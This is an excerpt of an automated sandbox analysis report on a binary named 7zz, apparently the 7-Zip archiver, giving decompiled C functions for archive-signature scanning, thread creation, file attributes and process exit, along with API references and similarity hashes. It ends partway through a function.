0x0041094e
0x0041094e
0x00410955
0x0041095a
0x0041095c
0x0041095e
0x0041095e
0x00410963
0x00410967
0x00410969
0x00410969
0x00410973
0x00410976
0x004109b6
0x004109b6
0x004109b6
0x004109b9
0x004109b9
0x004109be
0x004109c4
0x004109c9
0x004109ce
0x004109ce
0x004109d7
0x00000000
0x004108ff
0x0041076e
0x00410774
0x00410777
0x00410781
0x0041078a
0x0041078f
0x00410792
0x00410794
0x00410794
0x0041079f
0x004107a4
0x004107a7
0x004107aa
0x004107ac
0x004107b2
0x004107d2
0x004107db
0x004107dd
0x004107df
0x004107e5
0x004107fc
0x00410801
0x00410808
0x00410810
0x00410814
0x00410820
0x00410827
0x00410827
0x00410814
0x00410808
0x0041082f
0x00410835
0x00410837
0x00410839
0x0041083c
0x0041083e
0x00410844
0x00410846
0x0041084d
0x00410858
0x0041085f
0x0041085f
0x00410864
0x00410866
0x00410868
0x0041086c
0x0041086e
0x00410878
0x0041087f
0x0041087f
0x0041086c
0x00410866
0x00410884
0x00410886
0x0041089c
0x0041089c
0x004108a4
0x00000000
0x004107b4
0x004107b4
0x004107b7
0x004107b9
0x004107c5
0x004107c5
0x004107c9
0x00000000
0x00000000
0x004107cb
0x004107cb
0x004107cb
0x004107cb
0x00000000
0x004107cb
0x004107bb
0x004107bf
0x00000000
0x00000000
0x004107c1
0x004107c3
0x00000000
0x00000000
0x00000000
0x004107c3
0x00410591
0x00410591
0x00410598
0x004105aa
0x004105aa
0x004105b2
0x004105b7
0x004105be
0x004105ce
0x004105d0
0x004105d5
0x004105d7
0x004105e8
0x004105e8
0x004105f9
0x004105fb
0x00410600
0x00410602
0x00410613
0x00410613
0x0041061c
0x00410628
0x00410628
0x00410630
0x00410638
0x00410641
0x0041068a
0x0041068e
0x00410643
0x00410654
0x0041065f
0x00410660
0x00410664
0x0041066f
0x00410670
0x00410678
0x0041067c
0x00410681
0x00410693
0x00410697
0x004106a2
0x004106ab
0x004106b9
0x004106c3
0x004106ca
0x004106ca
0x004106db
0x004106f1
0x004106f8
0x004106f8
0x004106fd
0x0041070d
0x00410727
0x0041072b
0x0041072d
0x0041072d
0x0041070f
0x00410722
0x00410722
0x0041070d
0x00410734
0x0041073e
0x00410745
0x0041074a
0x00410751
0x00410a20
0x00410a23
0x00410a2e
0x00410a36
0x00410a36
0x0041058b
0x00410496
0x0041049c
0x00000000
0x004104a3
0x004104a3
0x00000000
0x004104a3

APIs

__EH_prolog.LIBCMT ref: 00410362

Part of subcall function 0041003E: __EH_prolog.LIBCMT ref: 00410043

Strings

Cannot use absolute pathnames for this command, xrefs: 004105A5
59@, xrefs: 0041036E

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: 59@$Cannot use absolute pathnames for this command
API String ID: 3519838083-753490679
Opcode ID: 1d0b522b18515802e249ba63502b82e806ed444de2582f4dd8cd52e64bc5bade
Instruction ID: 8adad491b5bf5222f818b6dcdc2d6027f4997ee1019a1a956a15da55c14c090b
Opcode Fuzzy Hash: 1d0b522b18515802e249ba63502b82e806ed444de2582f4dd8cd52e64bc5bade
Instruction Fuzzy Hash: D022C330A043849EDB25EB65C851BEE7BA1AF45308F04446FE1562F2D3CBBCA9C8C759

Uniqueness

Uniqueness Score: -1.00%

Function 0042D33C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0042D33C(void* __ecx, void* __eflags) {
				intOrPtr _t57;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr* _t75;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr _t85;
				intOrPtr _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t100;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr* _t111;
				void* _t113;
				intOrPtr _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;

				E0046B890(E004774D0, _t116);
				_t119 = _t118 - 0x20;
				_t113 = __ecx;
				_t83 = __ecx + 0x28;
				_t107 = 0x20;
				_t57 = E0040FAC0(__eflags, _t107); // executed
				if(_t57 == 0) {
					if(E0042D51A(_t83) == 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t116 - 0x2c)) = 0x47a7ec;
						 *((intOrPtr*)(_t116 - 0x28)) = 0;
						 *((intOrPtr*)(_t116 - 0x24)) = 0;
						 *((intOrPtr*)(_t116 - 4)) = 0;
						E0040FA26(_t116 - 0x2c, 0x10000);
						 *((intOrPtr*)(_t116 - 0x18)) =  *((intOrPtr*)(_t116 - 0x24));
						 *((intOrPtr*)(_t116 - 0x10)) = _t107;
						E0046C5C0( *((intOrPtr*)(_t116 - 0x24)), _t83, _t107);
						_t109 =  *((intOrPtr*)(_t113 + 0x20));
						_t85 =  *((intOrPtr*)(_t113 + 0x24));
						_t121 = _t119 + 0xc;
						while(1) {
							L4:
							_t100 =  *((intOrPtr*)(_t116 + 0xc));
							__eflags = _t100;
							if(_t100 == 0) {
								goto L8;
							}
							_t95 = _t109 -  *((intOrPtr*)(_t113 + 0x20));
							asm("sbb eax, [esi+0x24]");
							__eflags = _t85 -  *((intOrPtr*)(_t100 + 4));
							if(__eflags > 0) {
								L25:
								_t115 = 1;
							} else {
								if(__eflags < 0) {
									goto L8;
								} else {
									__eflags = _t95 -  *_t100;
									if(_t95 >  *_t100) {
										goto L25;
									} else {
										while(1) {
											L8:
											_t65 =  *((intOrPtr*)(_t116 - 0x10));
											_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 8)))) + 0xc))( *((intOrPtr*)(_t116 + 8)), _t65 +  *((intOrPtr*)(_t116 - 0x18)), 0x10000 - _t65, _t116 - 0x20);
											__eflags = _t67;
											if(_t67 != 0) {
												break;
											}
											_t69 =  *((intOrPtr*)(_t116 - 0x20));
											 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) + _t69;
											__eflags = _t69;
											if(_t69 == 0) {
												goto L25;
											} else {
												__eflags =  *((intOrPtr*)(_t116 - 0x10)) - 0x20;
												if( *((intOrPtr*)(_t116 - 0x10)) <= 0x20) {
													continue;
												} else {
													_t104 = 0;
													_t71 =  *((intOrPtr*)(_t116 - 0x10)) + 0xffffffe0;
													 *((intOrPtr*)(_t116 - 0x14)) = 0;
													__eflags = _t71;
													 *((intOrPtr*)(_t116 - 0x1c)) = _t71;
													if(_t71 <= 0) {
														_t93 =  *((intOrPtr*)(_t116 - 0x18));
														goto L23;
													} else {
														while(1) {
															_t93 =  *((intOrPtr*)(_t116 - 0x18));
															while(1) {
																L15:
																__eflags =  *((char*)(_t104 + _t93)) - 0x37;
																if( *((char*)(_t104 + _t93)) == 0x37) {
																	break;
																}
																__eflags = _t104 - _t71;
																if(__eflags < 0) {
																	_t104 = _t104 + 1;
																	 *((intOrPtr*)(_t116 - 0x14)) = _t104;
																	continue;
																}
																L19:
																if(__eflags == 0) {
																	L23:
																	_t109 = _t109 + _t71;
																	asm("adc ebx, 0x0");
																	 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) - _t71;
																	E0046BAB0(_t93, _t71 + _t93,  *((intOrPtr*)(_t116 - 0x10)));
																	_t121 = _t121 + 0xc;
																	goto L4;
																} else {
																	_t75 = E0042D4DD(_t93 + _t104);
																	__eflags = _t75;
																	if(_t75 != 0) {
																		E0046C5C0(_t113 + 0x28,  *((intOrPtr*)(_t116 - 0x14)) +  *((intOrPtr*)(_t116 - 0x18)), 0x20);
																		_t110 = _t109 +  *((intOrPtr*)(_t116 - 0x14));
																		_t80 =  *((intOrPtr*)(_t116 + 8));
																		 *((intOrPtr*)(_t113 + 0x20)) = _t110;
																		_t98 = 0;
																		asm("adc ebx, ecx");
																		_t111 = _t110 + 0x20;
																		__eflags = _t111;
																		 *((intOrPtr*)(_t113 + 0x24)) = _t85;
																		asm("adc ebx, ecx");
																		_t67 =  *((intOrPtr*)( *_t80 + 0x10))(_t80, _t111, _t85, _t98, _t98);
																		goto L27;
																	} else {
																		 *((intOrPtr*)(_t116 - 0x14)) =  *((intOrPtr*)(_t116 - 0x14)) + 1;
																		__eflags =  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c));
																		if( *((intOrPtr*)(_t116 - 0x14)) <  *((intOrPtr*)(_t116 - 0x1c))) {
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			_t104 =  *((intOrPtr*)(_t116 - 0x14));
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			continue;
																		} else {
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			goto L23;
																		}
																	}
																}
																goto L28;
															}
															__eflags = _t104 - _t71;
															goto L19;
														}
													}
												}
											}
											goto L28;
										}
										L27:
										_t115 = _t67;
									}
								}
							}
							L28:
							 *((intOrPtr*)(_t116 - 0x2c)) = 0x47a7ec;
							E00407A18( *((intOrPtr*)(_t116 - 0x24)));
							_t57 = _t115;
							goto L29;
						}
					} else {
						_t57 = 0;
					}
				}
				L29:
				 *[fs:0x0] =  *((intOrPtr*)(_t116 - 0xc));
				return _t57;
			}

0x0042d341
0x0042d346
0x0042d34c
0x0042d353
0x0042d356
0x0042d35a
0x0042d361
0x0042d370
0x0042d379
0x0042d37b
0x0042d382
0x0042d385
0x0042d390
0x0042d393
0x0042d39e
0x0042d3a1
0x0042d3a4
0x0042d3a9
0x0042d3ac
0x0042d3af
0x0042d3b2
0x0042d3b2
0x0042d3b2
0x0042d3b5
0x0042d3b7
0x00000000
0x00000000
0x0042d3bd
0x0042d3c0
0x0042d3c3
0x0042d3c6
0x0042d47c
0x0042d47e
0x0042d3cc
0x0042d3cc
0x00000000
0x0042d3ce
0x0042d3ce
0x0042d3d0
0x00000000
0x0042d3d6
0x0042d3d6
0x0042d3d6
0x0042d3e4
0x0042d3f3
0x0042d3f6
0x0042d3f8
0x00000000
0x00000000
0x0042d3fe
0x0042d401
0x0042d404
0x0042d406
0x00000000
0x0042d408
0x0042d408
0x0042d40c
0x00000000
0x0042d40e
0x0042d411
0x0042d413
0x0042d416
0x0042d419
0x0042d41b
0x0042d41e
0x0042d477
0x00000000
0x0042d420
0x0042d428
0x0042d428
0x0042d42b
0x0042d42b
0x0042d42b
0x0042d42f
0x00000000
0x00000000
0x0042d431
0x0042d433
0x0042d435
0x0042d436
0x00000000
0x0042d436
0x0042d43d
0x0042d43d
0x0042d45b
0x0042d45b
0x0042d45d
0x0042d460
0x0042d46a
0x0042d46f
0x00000000
0x0042d43f
0x0042d441
0x0042d446
0x0042d448
0x0042d490
0x0042d498
0x0042d49b
0x0042d4a0
0x0042d4a3
0x0042d4a4
0x0042d4a6
0x0042d4a6
0x0042d4a9
0x0042d4b0
0x0042d4b5
0x00000000
0x0042d44a
0x0042d44a
0x0042d450
0x0042d453
0x0042d422
0x0042d425
0x0042d428
0x00000000
0x0042d455
0x0042d455
0x0042d458
0x00000000
0x0042d458
0x0042d453
0x0042d448
0x00000000
0x0042d43d
0x0042d43b
0x00000000
0x0042d43b
0x0042d428
0x0042d41e
0x0042d40c
0x00000000
0x0042d406
0x0042d4b8
0x0042d4b8
0x0042d4b8
0x0042d3d0
0x0042d3cc
0x0042d4ba
0x0042d4bd
0x0042d4c4
0x0042d4ca
0x00000000
0x0042d4ca
0x0042d372
0x0042d372
0x0042d372
0x0042d370
0x0042d4cc
0x0042d4d2
0x0042d4da

APIs

__EH_prolog.LIBCMT ref: 0042D341

Strings

, xrefs: 0042D408
c[@, xrefs: 0042D37B, 0042D4BD

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: $c[@
API String ID: 3519838083-1303465990
Opcode ID: 69068367b15dc9bd673a90d53c0485621dc67a4ad571aeb8f90f6fb8c481df08
Instruction ID: dbd63947d3ec36f6418aa11a5244a4fc3f7eb44a15ca7d926c0188e08944aa22
Opcode Fuzzy Hash: 69068367b15dc9bd673a90d53c0485621dc67a4ad571aeb8f90f6fb8c481df08
Instruction Fuzzy Hash: 8851A3B1F002199BDB14DFA9D881ABFB7B5FF88304F50852AE405E7340D778A9418B65

Uniqueness

Uniqueness Score: -1.00%

Function 0046CD08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0046CD08(struct _SECURITY_ATTRIBUTES* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				void* _t18;
				long _t25;
				void* _t26;

				_t25 = 0;
				_t26 = L0046FE93(1, 0x74);
				if(_t26 == 0) {
					L3:
					E0046C0FF(_t26);
					if(_t25 != 0) {
						E004705D3(_t25);
					}
					return 0;
				}
				E0046E370(_t26);
				 *(_t26 + 4) =  *(_t26 + 4) | 0xffffffff;
				 *((intOrPtr*)(_t26 + 0x48)) = _a12;
				 *((intOrPtr*)(_t26 + 0x4c)) = _a16;
				_t9 =  &_a8; // 0x414677
				_t18 = CreateThread(_a4,  *_t9, E0046CD73, _t26, _a20, _a24); // executed
				if(_t18 == 0) {
					_t25 = GetLastError();
					goto L3;
				}
				return _t18;
			}

0x0046cd11
0x0046cd18
0x0046cd1e
0x0046cd5b
0x0046cd5c
0x0046cd64
0x0046cd67
0x0046cd6c
0x00000000
0x0046cd6d
0x0046cd21
0x0046cd2d
0x0046cd31
0x0046cd3a
0x0046cd43
0x0046cd49
0x0046cd51
0x0046cd59
0x00000000
0x0046cd59
0x0046cd72

APIs

Part of subcall function 0046FE93: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046FF89

CreateThread.KERNELBASE ref: 0046CD49
GetLastError.KERNEL32(?,00467AE9,00000000,00000000,004148ED,?,00000000,?,?,00414677,?,?), ref: 0046CD53

Strings

wFA, xrefs: 0046CD43

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: AllocCreateErrorHeapLastThread
String ID: wFA
API String ID: 3580101977-151469634
Opcode ID: b7a88149dd98dfaf9bb2c186dc88153770bf2f3049edd001e68c2968dc4fa82c
Instruction ID: 3bcaffb1de1f861aa2c0b81efa8886cf09e347fde19023c9913c4d3a853d5ec3
Opcode Fuzzy Hash: b7a88149dd98dfaf9bb2c186dc88153770bf2f3049edd001e68c2968dc4fa82c
Instruction Fuzzy Hash: 0DF0F4366006116BDB209F66EC41DAB3FA5DF81771B10443FFA5C82690EB3988518BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00409A29 Relevance: 4.6, APIs: 3, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409A29(WCHAR* __ecx, long __edx) {
				int _t18;
				signed int _t23;
				int _t24;
				signed int _t28;
				void* _t54;

				E0046B890(E00473A24, _t54);
				_t48 = __edx;
				if( *0x490a7c != 0) {
					_t18 = SetFileAttributesW(__ecx, __edx); // executed
					if(_t18 == 0) {
						 *(_t54 - 0x18) = 0;
						 *((intOrPtr*)(_t54 - 0x14)) = 0;
						 *((intOrPtr*)(_t54 - 0x10)) = 0;
						E00401E9A(_t54 - 0x18, 3);
						 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
						if(E0040B863(_t54 - 0x18) == 0) {
							E00407A18( *(_t54 - 0x18));
							_t23 = 0;
						} else {
							_t24 = SetFileAttributesW( *(_t54 - 0x18), _t48);
							_t23 = E00407A18( *(_t54 - 0x18)) & 0xffffff00 | _t24 != 0x00000000;
						}
					} else {
						_t23 = 1;
					}
				} else {
					_t28 = E004099A0( *((intOrPtr*)(E00409AD5(_t54 - 0x24, __ecx))), __edx);
					E00407A18( *((intOrPtr*)(_t54 - 0x24)));
					_t23 = _t28;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return _t23;
			}

0x00409a2e
0x00409a40
0x00409a44
0x00409a72
0x00409a76
0x00409a83
0x00409a86
0x00409a89
0x00409a8c
0x00409a91
0x00409aa1
0x00409abe
0x00409ac4
0x00409aa3
0x00409aa7
0x00409ab6
0x00409ab6
0x00409a78
0x00409a78
0x00409a78
0x00409a46
0x00409a56
0x00409a60
0x00409a66
0x00409a66
0x00409acc
0x00409ad4

APIs

__EH_prolog.LIBCMT ref: 00409A2E
SetFileAttributesW.KERNELBASE(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00409A72

Part of subcall function 00409AD5: __EH_prolog.LIBCMT ref: 00409ADA
Part of subcall function 00409AD5: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00409AF6

Part of subcall function 004099A0: SetFileAttributesA.KERNEL32(?,?,00409A5B,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004099A2

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: File$AttributesH_prolog$Apis
String ID:
API String ID: 1724483454-0
Opcode ID: 43186953be5daf0de57b10679b82a724e15aa266f1dac7b6fd580aaf3804a6e7
Instruction ID: 62381452fa1776ecf317f5749025f9a102d19c157996ae2428c02df752bbe2da
Opcode Fuzzy Hash: 43186953be5daf0de57b10679b82a724e15aa266f1dac7b6fd580aaf3804a6e7
Instruction Fuzzy Hash: 9B116372F002459BCF04EF6698426AEBBB9DF85354F14443FE501B72D2DA3C4E059BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0046E717 Relevance: 4.6, APIs: 3, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0046E717(void* __esi, int _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t9;
				intOrPtr* _t11;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;
				void* _t32;

				_t24 = __esi;
				E0046E7BC();
				_t23 = 1;
				_t27 =  *0x49372c - _t23; // 0x1
				if(_t27 == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				_t16 = _a12;
				 *0x493728 = _t23;
				 *0x493724 = _t16;
				if(_a8 == 0) {
					_t9 =  *0x496594; // 0x2200ab8
					if(_t9 != 0) {
						_t22 =  *0x496590; // 0x2200ae4
						_push(_t24);
						_t4 = _t22 - 4; // 0x2200ae0
						_t25 = _t4;
						if(_t25 >= _t9) {
							do {
								_t11 =  *_t25;
								if(_t11 != 0) {
									 *_t11();
								}
								_t25 = _t25 - 4;
								_t32 = _t25 -  *0x496594; // 0x2200ab8
							} while (_t32 >= 0);
						}
					}
					E0046E7CE(0x48a0e0, 0x48a0e8);
				}
				E0046E7CE(0x48a0ec, 0x48a0f4);
				if(_t16 == 0) {
					 *0x49372c = _t23; // executed
					ExitProcess(_a4);
				}
				return E0046E7C5();
			}

0x0046e717
0x0046e718
0x0046e71f
0x0046e720
0x0046e726
0x0046e733
0x0046e733
0x0046e73f
0x0046e743
0x0046e749
0x0046e74f
0x0046e751
0x0046e758
0x0046e75a
0x0046e760
0x0046e761
0x0046e761
0x0046e766
0x0046e768
0x0046e768
0x0046e76c
0x0046e76e
0x0046e76e
0x0046e770
0x0046e773
0x0046e773
0x0046e768
0x0046e77b
0x0046e786
0x0046e78c
0x0046e797
0x0046e7a1
0x0046e7ae
0x0046e7b4
0x0046e7b4
0x0046e7a9

APIs

GetCurrentProcess.KERNEL32(0046D01D,?,0046E702,00000000,00000000,00000000,0046D01D,00000000), ref: 0046E72C
TerminateProcess.KERNEL32(00000000,?,0046E702,00000000,00000000,00000000,0046D01D,00000000), ref: 0046E733
ExitProcess.KERNEL32 ref: 0046E7B4

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d37c32f3b74641771bf8449d0f21babc3d9490daefb6715abc0a0bd2884901a9
Instruction ID: f2142e9f323653ae12a02806cee2fc2220ca4adb72cbe7e174c19522fd5f48b0
Opcode Fuzzy Hash: d37c32f3b74641771bf8449d0f21babc3d9490daefb6715abc0a0bd2884901a9
Instruction Fuzzy Hash: D2010879100301AEEA10AF67FC8151E77E8EB65752B10843FF44456151EB699C908B1F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6D6 Relevance: 4.5, APIs: 3, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E6D6(intOrPtr* __ecx) {
				intOrPtr* _t15;
				void* _t16;
				void* _t22;
				struct _CRITICAL_SECTION* _t23;
				void* _t25;
				intOrPtr* _t26;
				intOrPtr* _t29;
				void* _t30;

				E0046B890(E00474014, _t30);
				_t26 = __ecx;
				_t23 = __ecx + 4;
				 *(_t30 - 0x10) = _t23;
				EnterCriticalSection(_t23);
				_t15 =  *_t26;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t16 =  *((intOrPtr*)( *_t15 + 0x10))(_t15,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), 0, 0, _t22, _t25, __ecx);
				if(_t16 == 0) {
					_t29 =  *_t26;
					_t16 =  *((intOrPtr*)( *_t29 + 0xc))(_t29,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)));
				}
				LeaveCriticalSection(_t23);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}

0x0040e6db
0x0040e6e2
0x0040e6e5
0x0040e6e9
0x0040e6ec
0x0040e6f2
0x0040e6f8
0x0040e705
0x0040e70a
0x0040e70f
0x0040e71a
0x0040e71a
0x0040e720
0x0040e72d
0x0040e735

APIs

__EH_prolog.LIBCMT ref: 0040E6DB
EnterCriticalSection.KERNEL32(00000000,?,?,?,0040E75C,?,?,?,?,?), ref: 0040E6EC
LeaveCriticalSection.KERNEL32(00000000,?,?,?,0040E75C,?,?,?,?,?), ref: 0040E720

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalSection$EnterH_prologLeave
String ID:
API String ID: 367238759-0
Opcode ID: 049483b65675be0fe03f61d34f865e17871a24ff9367e82253095f38623ff512
Instruction ID: e741d22780284c861742e84a626bb0d46a40b6509f00f1721e03e5846f5cf661
Opcode Fuzzy Hash: 049483b65675be0fe03f61d34f865e17871a24ff9367e82253095f38623ff512
Instruction Fuzzy Hash: EA011D76A00214AFCB119F94CC08B9EB7B9FF88711F10886AFD05E7250C774A950DF64

Uniqueness

Uniqueness Score: -1.00%

Function 0042EC5C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 315
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0042EC5C(intOrPtr* __ecx, void* __eflags) {
				char* _t134;
				void* _t139;
				intOrPtr _t140;
				signed int _t143;
				intOrPtr* _t144;
				signed int _t146;
				void* _t148;
				void* _t152;
				signed int _t156;
				void* _t160;
				intOrPtr* _t171;
				intOrPtr* _t172;
				void* _t174;
				intOrPtr _t178;
				intOrPtr _t182;
				intOrPtr* _t183;
				signed int _t186;
				intOrPtr _t221;
				intOrPtr* _t222;
				void* _t224;
				void* _t228;
				signed int _t232;
				intOrPtr _t239;
				signed int _t240;
				intOrPtr _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t248;
				intOrPtr* _t252;
				signed int _t254;
				void* _t255;

				E0046B890(E00477698, _t255);
				_t243 =  *((intOrPtr*)(_t255 + 8));
				_t252 = __ecx;
				E0042B5A9(_t243);
				 *((intOrPtr*)(_t243 + 0x138)) =  *((intOrPtr*)(_t252 + 0x20));
				 *((intOrPtr*)(_t243 + 0x13c)) =  *((intOrPtr*)(_t252 + 0x24));
				_t134 = _t243 + 0x130;
